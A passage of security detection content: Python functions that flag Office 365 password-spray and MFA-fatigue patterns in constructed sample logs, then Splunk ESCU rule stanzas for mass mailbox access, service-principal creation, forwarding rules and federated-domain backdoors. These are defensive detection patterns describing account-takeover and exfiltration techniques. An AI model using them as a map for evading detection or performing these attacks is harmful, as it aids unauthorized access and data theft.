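        if not is_login_failed(ev) or str(ev.get("ErrorNumber")) != "50126":
            continue
        b = per_bucket[bucket_start(to_epoch(ev["CreationTime"]), 300)]
        b["combos"].add(f'{ev["ClientIP"]}-{ev["UserId"]}')  # src_ip . "-" . user
        b["users"].add(ev["UserId"])
        b["ips"].add(ev["ClientIP"])
        b["agents"].add(ev.get("UserAgent", ""))
    hits = []
    for start, b in sorted(per_bucket.items()):
        if len(b["combos"]) > min_combos and len(b["users"]) > min_users and len(b["ips"]) > min_ips:
            hits.append({"bucket": start, "uniqueIpUserCombinations": len(b["combos"]),
                         "uniqueUsers": len(b["users"]), "uniqueIPs": len(b["ips"]),
                         "user_agents": sorted(b["agents"])})
    return hits


def multiple_failed_mfa_requests(events, max_prompts=9):
    """Flag (user, 10-minute bucket) pairs with more than max_prompts MFA prompts, i.e.
    UserLoginFailed events whose ResultStatus is Success and ErrorNumber is 500121."""
    prompts = defaultdict(int)
    for ev in events:
        if (not is_login_failed(ev) or ev.get("ResultStatus") != "Success"
                or str(ev.get("ErrorNumber")) != "500121"):
            continue
        prompts[(ev["UserId"], bucket_start(to_epoch(ev["CreationTime"]), 600))] += 1
    return [{"user": u, "bucket": b, "mfa_prompts": n}
            for (u, b), n in sorted(prompts.items()) if n > max_prompts]


# --- constructed sample data (not captured tenant logs) -----------------------------
_BASE = datetime(2024, 3, 1, 12, 0, tzinfo=timezone.utc)


def _event(offset_s, user, ip, error, status="Failed", agent="Mozilla/5.0"):
    return {"Workload": "AzureActiveDirectory", "Operation": "UserLoginFailed",
            "CreationTime": (_BASE + timedelta(seconds=offset_s)).strftime("%Y-%m-%dT%H:%M:%S"),
            "UserId": user, "ClientIP": ip, "UserAgent": agent,
            "ResultStatus": status, "ErrorNumber": error}


# 25 accounts tried from 25 different addresses inside one 5-minute window: a spray spike.
SPRAY_SAMPLE = [_event(i * 10, f"user{i:02d}@example.com", f"198.51.100.{i}", 50126,
                       agent=f"agent-{i % 3}") for i in range(25)]
# Same volume from a single address: many users but one IP, so the spray rule stays quiet.
SINGLE_SOURCE_SAMPLE = [_event(i * 10, f"user{i:02d}@example.com", "198.51.100.1", 50126)
                        for i in range(25)]
# Ten MFA prompts for one account within ten minutes, nine for another (below threshold).
MFA_SAMPLE = ([_event(i * 30, "alice@example.com", "203.0.113.7", 500121, status="Success")
               for i in range(10)]
              + [_event(i * 30, "bob@example.com", "203.0.113.8", 500121, status="Success")
                 for i in range(9)])

if __name__ == "__main__":
    print(multi_source_failed_auth_spike(SPRAY_SAMPLE))
    print(multi_source_failed_auth_spike(SINGLE_SOURCE_SAMPLE))
    print(multiple_failed_mfa_requests(MFA_SAMPLE))
```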
action.escu.creation_date = 2023-10-19 action.escu.modification_date = 2023-10-19 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Multiple Failed MFA Requests For User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Account Takeover"] action.risk = 1 action.risk.param._risk_message = Multiple failed MFA requestes for $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 48}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Multiple Failed MFA Requests For User - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Account Takeover"], "cis20": ["CIS 10"], "confidence": 80, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1621"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies potential "MFA fatigue" attacks targeting Office 365 users. Specifically, it detects scenarios where a user experiences more than nine Multi-Factor Authentication (MFA) prompts within a 10-minute timeframe. Attackers may exploit MFA fatigue by repeatedly triggering MFA requests, hoping that the user, out of frustration or oversight, will approve a malicious authentication attempt. The detection leverages O365 management activity logs, focusing on Azure Active Directory events. It looks for the UserLoginFailed operation combined with a Success ResultStatus and an ErrorNumber of 500121, which indicates MFA prompts. 
By monitoring these specific events and conditions, the analytic captures and alerts on potential MFA fatigue scenarios. With MFA being a cornerstone of modern cybersecurity defenses, attackers are constantly seeking ways to bypass or exploit it. MFA fatigue is one such tactic, where attackers rely on user frustration or confusion caused by frequent MFA prompts. Detecting potential MFA fatigue scenarios allows security teams to proactively investigate and ensure that users aren't inadvertently granting access to malicious actors. If this detection flags a true positive, it suggests a potential attempt by an attacker to exploit MFA mechanisms to gain unauthorized access to an O365 account. Successful exploitation could lead to data breaches, unauthorized data access, or further compromise within the O365 environment. Immediate investigation and response would be crucial to safeguard the affected account and assess the full scope of the potential breach. action.notable.param.rule_title = O365 Multiple Failed MFA Requests For User action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=AzureActiveDirectory Operation=UserLoginFailed ResultStatus=Success ErrorNumber=500121 | bucket span=10m _time | stats dc(_raw) as mfa_prompts values(LogonError) as LogonError values(signature) as signature by user, _time | where mfa_prompts > 9 | `o365_multiple_failed_mfa_requests_for_user_filter` [ESCU - O365 Multiple Mailboxes Accessed via API - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic is designed to trigger when a high number of Office 365 Exchange mailboxes are accessed via API (Microsoft Graph API or Exchange Web Services) in a short time, hinting at possible unauthorized mass email access. 
It tracks 'MailItemsAccessed' operations in Exchange, using AppId and regex to identify API interactions. Crucial for SOC teams, this analytic focuses on spotting abnormal access patterns, often signaling data exfiltration or account compromise. Security teams should tailor the threshold set here to flag over five unique mailboxes accessed within 10 minutes to align with their environment's norms, ensuring effective detection of potential security incidents while maintaining operational efficiency. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114.002"], "nist": ["DE.CM"]} action.escu.data_models = ["Web"] action.escu.eli5 = The following analytic is designed to trigger when a high number of Office 365 Exchange mailboxes are accessed via API (Microsoft Graph API or Exchange Web Services) in a short time, hinting at possible unauthorized mass email access. It tracks 'MailItemsAccessed' operations in Exchange, using AppId and regex to identify API interactions. Crucial for SOC teams, this analytic focuses on spotting abnormal access patterns, often signaling data exfiltration or account compromise. Security teams should tailor the threshold set here to flag over five unique mailboxes accessed within 10 minutes to align with their environment's norms, ensuring effective detection of potential security incidents while maintaining operational efficiency. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = Legitimate applications may access multiple mailboxes via an API. You can filter by the ClientAppId or the CLientIpAddress fields. 
action.escu.creation_date = 2024-02-01 action.escu.modification_date = 2024-02-01 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Multiple Mailboxes Accessed via API - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Collection Techniques", "NOBELIUM Group"] action.risk = 1 action.risk.param._risk_message = An Oauth application identified with id $ClientAppId$ accessed multiple mailboxes in a short period of time via an API. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Multiple Mailboxes Accessed via API - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection Techniques", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic is designed to trigger when a high number of Office 365 Exchange mailboxes are accessed via API (Microsoft Graph API or Exchange Web Services) in a short time, hinting at possible unauthorized mass email access. It tracks 'MailItemsAccessed' operations in Exchange, using AppId and regex to identify API interactions. Crucial for SOC teams, this analytic focuses on spotting abnormal access patterns, often signaling data exfiltration or account compromise. 
Security teams should tailor the threshold set here to flag over five unique mailboxes accessed within 10 minutes to align with their environment's norms, ensuring effective detection of potential security incidents while maintaining operational efficiency. action.notable.param.rule_title = O365 Multiple Mailboxes Accessed via API action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=Exchange Operation=MailItemsAccessed AppId=* ClientAppId=* | bucket span=10m _time | eval matchRegex=if(match(ClientInfoString, "^Client=WebServices;ExchangeWebServices"), 1, 0) | search (AppId="00000003-0000-0000-c000-000000000000" OR matchRegex=1) | stats values(ClientIPAddress) as src_ip dc(user) as unique_mailboxes values(user) as user by _time ClientAppId ClientInfoString | where unique_mailboxes > 5 | `o365_multiple_mailboxes_accessed_via_api_filter` [ESCU - O365 Multiple Service Principals Created by SP - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection aims to identify instances where a single service principal creates more than three unique OAuth applications within a 10-minute timeframe, using O365 logs from the Unified Audit Log. The focus is on tracking the 'Add service principal' operation within the Office 365 Azure Active Directory environment. The query effectively buckets events in 10-minute intervals, specifically scrutinizing the actions of service principals. By quantifying the number of distinct OAuth applications each service principal establishes, the analytic provides critical insights for SOC teams into potentially anomalous or malicious activities. 
These activities could include a compromised or malicious service principal being used to create multiple service principals, which might be indicative of an attempt to expand control or access within the network. Security teams are advised to adapt the threshold of three applications to align with their typical operational baseline action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This detection aims to identify instances where a single service principal creates more than three unique OAuth applications within a 10-minute timeframe, using O365 logs from the Unified Audit Log. The focus is on tracking the 'Add service principal' operation within the Office 365 Azure Active Directory environment. The query effectively buckets events in 10-minute intervals, specifically scrutinizing the actions of service principals. By quantifying the number of distinct OAuth applications each service principal establishes, the analytic provides critical insights for SOC teams into potentially anomalous or malicious activities. These activities could include a compromised or malicious service principal being used to create multiple service principals, which might be indicative of an attempt to expand control or access within the network. Security teams are advised to adapt the threshold of three applications to align with their typical operational baseline action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = Certain users or applications may create multiple service principals in a short period of time for legitimate purposes. Filter as needed. 
action.escu.creation_date = 2024-02-07
action.escu.modification_date = 2024-02-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - O365 Multiple Service Principals Created by SP - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Office 365"]
action.escu.analytic_story = ["Office 365 Persistence Mechanisms", "NOBELIUM Group"]
action.risk = 1
action.risk.param._risk_message = Multiple OAuth applications were created by $src_user$ in a short period of time
action.risk.param._risk = [{"risk_object_field": "src_user", "risk_object_type": "other", "risk_score": 42}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - O365 Multiple Service Principals Created by SP - Rule
action.correlationsearch.annotations = {"analytic_story": ["Office 365 Persistence Mechanisms", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `o365_management_activity` Workload=AzureActiveDirectory Operation="Add service principal." | bucket span=10m _time | eval len=mvcount('Actor{}.ID') | eval userType = mvindex('Actor{}.ID',len-1) | search userType = "ServicePrincipal" | eval displayName = object | stats count earliest(_time) as firstTime latest(_time) as lastTime values(displayName) as displayName dc(displayName) as unique_apps by src_user | where unique_apps > 3 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_multiple_service_principals_created_by_sp_filter`

[ESCU - O365 Multiple Service Principals Created by User - Rule]
action.escu = 0
action.escu.enabled = 1
description = This detection is tailored to spot occurrences where a single user, rather than a service principal, creates more than three unique OAuth applications within a 10-minute window in the Office 365 environment. Utilizing O365 logs from the Unified Audit Log, it focuses on the 'Add service principal' operation in Azure Active Directory. The query segments events into 10-minute intervals, exclusively monitoring user activities. It calculates the number of distinct OAuth applications initiated by each user, providing SOC teams with essential data for identifying potential security threats. Such activity could suggest that a user account is either compromised or engaged in unauthorized activities, potentially setting the stage for broader network infiltration or privilege escalation. It's important for security teams to adjust the threshold of three applications to fit their operational context.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This detection is tailored to spot occurrences where a single user, rather than a service principal, creates more than three unique OAuth applications within a 10-minute window in the Office 365 environment. Utilizing O365 logs from the Unified Audit Log, it focuses on the 'Add service principal' operation in Azure Active Directory. The query segments events into 10-minute intervals, exclusively monitoring user activities. It calculates the number of distinct OAuth applications initiated by each user, providing SOC teams with essential data for identifying potential security threats. Such activity could suggest that a user account is either compromised or engaged in unauthorized activities, potentially setting the stage for broader network infiltration or privilege escalation. It's important for security teams to adjust the threshold of three applications to fit their operational context.
action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events.
action.escu.known_false_positives = Certain users or applications may create multiple service principals in a short period of time for legitimate purposes. Filter as needed.
action.escu.creation_date = 2024-02-07
action.escu.modification_date = 2024-02-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - O365 Multiple Service Principals Created by User - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Office 365"]
action.escu.analytic_story = ["Office 365 Persistence Mechanisms", "NOBELIUM Group"]
action.risk = 1
action.risk.param._risk_message = Multiple OAuth applications were created by $src_user$ in a short period of time
action.risk.param._risk = [{"risk_object_field": "src_user", "risk_object_type": "other", "risk_score": 42}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - O365 Multiple Service Principals Created by User - Rule
action.correlationsearch.annotations = {"analytic_story": ["Office 365 Persistence Mechanisms", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `o365_management_activity` Workload=AzureActiveDirectory Operation="Add service principal." | bucket span=10m _time | eval len=mvcount('Actor{}.ID') | eval userType = mvindex('Actor{}.ID',len-1) | search userType = "User" | eval displayName = object | stats count earliest(_time) as firstTime latest(_time) as lastTime values(displayName) as displayName dc(displayName) as unique_apps by src_user | where unique_apps > 3 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_multiple_service_principals_created_by_user_filter`

[ESCU - O365 Multiple Users Failing To Authenticate From Ip - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic identifies instances where multiple users (more than 10 unique accounts) have failed to authenticate from a single IP address within a short time span (5 minutes). Such a pattern can be indicative of malicious activities, such as brute-force attacks or password spraying attempts. The detection leverages O365 audit logs, specifically focusing on Azure Active Directory login failures (AzureActiveDirectoryStsLogon). By aggregating these failures based on the source IP address and time, the analytic captures patterns where multiple unique user accounts have authentication failures from the same IP within a 5-minute window. Multiple authentication failures from a single IP address targeting various accounts can be a strong indicator of an attacker trying to gain unauthorized access. It could represent a brute-force attack, password spraying, or other malicious login attempts. Identifying and responding to such patterns promptly is crucial to prevent potential account compromises and unauthorized access to organizational resources. If the detection is a true positive, it suggests that an external entity is actively trying to breach the security by targeting multiple user accounts. While the attempts have been unsuccessful (as indicated by the login failures), it's a clear sign of malicious intent. Immediate action is required to block or monitor the suspicious IP, investigate the nature of the attempts, and potentially notify affected users to take precautionary measures like password changes or enabling multi-factor authentication.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003", "T1110.004"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This analytic identifies instances where multiple users (more than 10 unique accounts) have failed to authenticate from a single IP address within a short time span (5 minutes). Such a pattern can be indicative of malicious activities, such as brute-force attacks or password spraying attempts. The detection leverages O365 audit logs, specifically focusing on Azure Active Directory login failures (AzureActiveDirectoryStsLogon). By aggregating these failures based on the source IP address and time, the analytic captures patterns where multiple unique user accounts have authentication failures from the same IP within a 5-minute window. Multiple authentication failures from a single IP address targeting various accounts can be a strong indicator of an attacker trying to gain unauthorized access. It could represent a brute-force attack, password spraying, or other malicious login attempts. Identifying and responding to such patterns promptly is crucial to prevent potential account compromises and unauthorized access to organizational resources. If the detection is a true positive, it suggests that an external entity is actively trying to breach the security by targeting multiple user accounts. While the attempts have been unsuccessful (as indicated by the login failures), it's a clear sign of malicious intent. Immediate action is required to block or monitor the suspicious IP, investigate the nature of the attempts, and potentially notify affected users to take precautionary measures like password changes or enabling multi-factor authentication.
action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events.
action.escu.known_false_positives = A source IP failing to authenticate with multiple users in a short period of time is not common legitimate behavior.
action.escu.creation_date = 2024-03-19
action.escu.modification_date = 2024-03-19
action.escu.confidence = high
action.escu.full_search_name = ESCU - O365 Multiple Users Failing To Authenticate From Ip - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Office 365"]
action.escu.analytic_story = ["Office 365 Account Takeover", "NOBELIUM Group"]
action.risk = 1
action.risk.param._risk_message = Source IP $src_ip$ failed to authenticate with 20 users within 5 minutes.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 63}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - O365 Multiple Users Failing To Authenticate From Ip - Rule
action.correlationsearch.annotations = {"analytic_story": ["Office 365 Account Takeover", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003", "T1110.004"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic identifies instances where multiple users (more than 10 unique accounts) have failed to authenticate from a single IP address within a short time span (5 minutes). Such a pattern can be indicative of malicious activities, such as brute-force attacks or password spraying attempts. The detection leverages O365 audit logs, specifically focusing on Azure Active Directory login failures (AzureActiveDirectoryStsLogon). By aggregating these failures based on the source IP address and time, the analytic captures patterns where multiple unique user accounts have authentication failures from the same IP within a 5-minute window. Multiple authentication failures from a single IP address targeting various accounts can be a strong indicator of an attacker trying to gain unauthorized access. It could represent a brute-force attack, password spraying, or other malicious login attempts. Identifying and responding to such patterns promptly is crucial to prevent potential account compromises and unauthorized access to organizational resources. If the detection is a true positive, it suggests that an external entity is actively trying to breach the security by targeting multiple user accounts. While the attempts have been unsuccessful (as indicated by the login failures), it's a clear sign of malicious intent. Immediate action is required to block or monitor the suspicious IP, investigate the nature of the attempts, and potentially notify affected users to take precautionary measures like password changes or enabling multi-factor authentication.
action.notable.param.rule_title = O365 Multiple Users Failing To Authenticate From Ip
action.notable.param.security_domain = identity
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `o365_management_activity` Workload=AzureActiveDirectory Operation=UserLoginFailed ErrorNumber=50126 | bucket span=5m _time | stats dc(user) as unique_accounts values(user) as user values(LogonError) as LogonError values(signature) as signature values(UserAgent) as UserAgent by _time, src_ip | where unique_accounts > 10 | `o365_multiple_users_failing_to_authenticate_from_ip_filter`

[ESCU - O365 New Email Forwarding Rule Created - Rule]
action.escu = 0
action.escu.enabled = 1
description = This detection is crafted to monitor and identify the creation of new email forwarding rules in an Office 365 environment. It specifically targets events logged under New-InboxRule and Set-InboxRule operations within o365_management_activity, indicating the establishment or modification of inbox rules that forward emails. The detection checks for the presence of parameters such as ForwardTo, ForwardAsAttachmentTo, and RedirectTo, which are key indicators of email forwarding behavior.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.003"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This detection is crafted to monitor and identify the creation of new email forwarding rules in an Office 365 environment. It specifically targets events logged under New-InboxRule and Set-InboxRule operations within o365_management_activity, indicating the establishment or modification of inbox rules that forward emails. The detection checks for the presence of parameters such as ForwardTo, ForwardAsAttachmentTo, and RedirectTo, which are key indicators of email forwarding behavior.
action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events.
action.escu.known_false_positives = Users may create email forwarding rules for legitimate purposes. Filter as needed.
action.escu.creation_date = 2024-03-27
action.escu.modification_date = 2024-03-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - O365 New Email Forwarding Rule Created - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Office 365"]
action.escu.analytic_story = ["Office 365 Collection Techniques"]
action.risk = 1
action.risk.param._risk_message = A forwarding email inbox rule was created for $user$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - O365 New Email Forwarding Rule Created - Rule
action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection Techniques"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This detection is crafted to monitor and identify the creation of new email forwarding rules in an Office 365 environment. It specifically targets events logged under New-InboxRule and Set-InboxRule operations within o365_management_activity, indicating the establishment or modification of inbox rules that forward emails. The detection checks for the presence of parameters such as ForwardTo, ForwardAsAttachmentTo, and RedirectTo, which are key indicators of email forwarding behavior.
action.notable.param.rule_title = O365 New Email Forwarding Rule Created
action.notable.param.security_domain = audit
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `o365_management_activity` (Operation=New-InboxRule OR Operation=set-InboxRule) | eval match1=mvfind('Parameters{}.Name', "ForwardTo") | eval match2=mvfind('Parameters{}.Name', "ForwardAsAttachmentTo") | eval match3=mvfind('Parameters{}.Name', "RedirectTo") | where match1>= 0 OR match2>= 0 OR match3>= 0 | eval ForwardTo=coalesce(ForwardTo, ForwardAsAttachmentTo, RedirectTo) | stats count min(_time) as firstTime max(_time) as lastTime values(Name) as Name by user Operation ForwardTo | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_new_email_forwarding_rule_created_filter`

[ESCU - O365 New Email Forwarding Rule Enabled - Rule]
action.escu = 0
action.escu.enabled = 1
description = This detection aims to identify instances where new email forwarding rules are created through the UpdateInboxRules operation within an Office 365 environment. Despite the operation name suggesting an update, this specific scenario involves the addition of new rules that direct emails to external recipients, captured under the ForwardToRecipientsAction. The analytic examines the OperationProperties to extract and validate forwarding addresses, ensuring they adhere to the expected email format.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.003"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This detection aims to identify instances where new email forwarding rules are created through the UpdateInboxRules operation within an Office 365 environment. Despite the operation name suggesting an update, this specific scenario involves the addition of new rules that direct emails to external recipients, captured under the ForwardToRecipientsAction. The analytic examines the OperationProperties to extract and validate forwarding addresses, ensuring they adhere to the expected email format.
action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events.
action.escu.known_false_positives = Users may create email forwarding rules for legitimate purposes. Filter as needed.
action.escu.creation_date = 2024-03-28
action.escu.modification_date = 2024-03-28
action.escu.confidence = high
action.escu.full_search_name = ESCU - O365 New Email Forwarding Rule Enabled - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Office 365"]
action.escu.analytic_story = ["Office 365 Collection Techniques"]
action.risk = 1
action.risk.param._risk_message = A forwarding email inbox rule was created for $user$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - O365 New Email Forwarding Rule Enabled - Rule
action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection Techniques"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This detection aims to identify instances where new email forwarding rules are created through the UpdateInboxRules operation within an Office 365 environment. Despite the operation name suggesting an update, this specific scenario involves the addition of new rules that direct emails to external recipients, captured under the ForwardToRecipientsAction. The analytic examines the OperationProperties to extract and validate forwarding addresses, ensuring they adhere to the expected email format.
action.notable.param.rule_title = O365 New Email Forwarding Rule Enabled
action.notable.param.security_domain = audit
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `o365_management_activity` Workload=Exchange Operation=UpdateInboxRules | eval match1=mvfind('OperationProperties{}.Value', "ForwardToRecipientsAction") | eval match2=mvfind('OperationProperties{}.Value', "ForwardAsAttachmentToRecipientsAction") | eval match3=mvfind('OperationProperties{}.Value', "RedirectToRecipientsAction") | eval index = mvfind('OperationProperties{}.Name', "ServerRule") | where match1>= 0 OR match2>= 0 OR match3>= 0 | eval ServerRule = mvindex('OperationProperties{}.Value', index-1) | spath input=ServerRule path=Actions{}.Recipients{}.Values{}.Value output=valueExtracted | mvexpand valueExtracted | search valueExtracted="*@*.*" | eval ForwardTo=if(match(valueExtracted, "^[^@]+@[^@]+\\.[^@]+$"), valueExtracted, null) | dedup ForwardTo | where isnotnull(ForwardTo) | stats count min(_time) as firstTime max(_time) as lastTime values(Name) as Name by user Operation ForwardTo | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_new_email_forwarding_rule_enabled_filter`

[ESCU - O365 New Federated Domain Added - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies the addition of a new federated domain in an organization's Office 365 environment. This behavior is detected by analyzing the Office 365 management activity logs using the Splunk query o365_management_activity, specifically filtering for the Workload=Exchange and Operation="Add-FederatedDomain" parameters. The addition of a new federated domain can be a significant security concern, as it might indicate unauthorized changes or potential compromises within the Office 365 setup. Attackers, upon gaining sufficient privileges, could add a federated domain to establish a backdoor, bypass security measures, or exfiltrate data. Such unauthorized changes can lead to data breaches, unauthorized access to sensitive data, and potential compromise of organizational infrastructure. When this analytic is triggered, immediate steps should include reviewing the details of the added federated domain, such as the organization name, originating server, user ID, and user key. Concurrent processes or other indicators of compromise should also be investigated to pinpoint the source of the potential breach.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003", "T1136"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies the addition of a new federated domain in an organization's Office 365 environment. This behavior is detected by analyzing the Office 365 management activity logs using the Splunk query o365_management_activity, specifically filtering for the Workload=Exchange and Operation="Add-FederatedDomain" parameters. The addition of a new federated domain can be a significant security concern, as it might indicate unauthorized changes or potential compromises within the Office 365 setup. Attackers, upon gaining sufficient privileges, could add a federated domain to establish a backdoor, bypass security measures, or exfiltrate data. Such unauthorized changes can lead to data breaches, unauthorized access to sensitive data, and potential compromise of organizational infrastructure. When this analytic is triggered, immediate steps should include reviewing the details of the added federated domain, such as the organization name, originating server, user ID, and user key. Concurrent processes or other indicators of compromise should also be investigated to pinpoint the source of the potential breach.
